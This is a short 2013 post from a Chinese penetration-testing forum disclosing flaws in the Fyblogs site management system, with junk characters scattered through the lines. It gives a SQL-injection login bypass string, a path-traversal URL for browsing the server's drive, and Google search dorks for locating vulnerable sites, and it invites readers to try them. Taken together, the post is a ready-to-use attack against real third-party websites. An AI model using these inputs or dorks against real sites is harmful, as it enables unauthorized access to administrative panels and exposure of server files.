中国网络渗透测试联盟

标题: Fyblogs网站管理系统漏洞 [打印本页]

作者: admin    时间: 2013-3-7 13:07
标题: Fyblogs网站管理系统漏洞
漏洞类型: 未授权访问/权限绕过- K3 h8 H5 h" ~; ]2 T

7 c' o: u% }& \9 Q5 a% g简要描述:
4 Y! ^9 ?1 F, [& V/ q- t  S. {
# ]2 L  M3 r/ @1 c  y9 f: Q# vFyblogs网站管理系统,,后台存在万能密码,后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
) F/ k$ e5 I) P% l0 p/ _
0 M4 B. g4 K% t* o' Y- {详细说明:! ?% I/ G+ Z+ u) ]: ^) q

+ N9 `4 S2 Y* `后台万能密码 'or'='or'
& S  h- e- {" |后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
: k. ]: {5 H+ z' S) J. Padmin/uploadfile.asp?currentFolder=/upfiles/../
% W5 K- W/ }3 o4 {+ p7 S
/ _7 }; B" I' C漏洞证明:3 g' N- f: S+ r& ^

! S; v% @* V4 I- D$ q2 V$ ]4 h谷歌:inurl:type.asp?id=1 新闻中心% ?+ G# Z; Q; x) |9 M- D  d
或者 :inurl:download_ok.asp?
5 f7 e6 _7 R0 M" `: V
+ i! Z2 Q8 |) L/ V% s. Q1 m可以测试
4 k5 x- D. I4 i- `( G$ z' P* e7 u6 Q  m. w+ r8 ^( L
2 |1 d6 J+ y9 A( B





欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2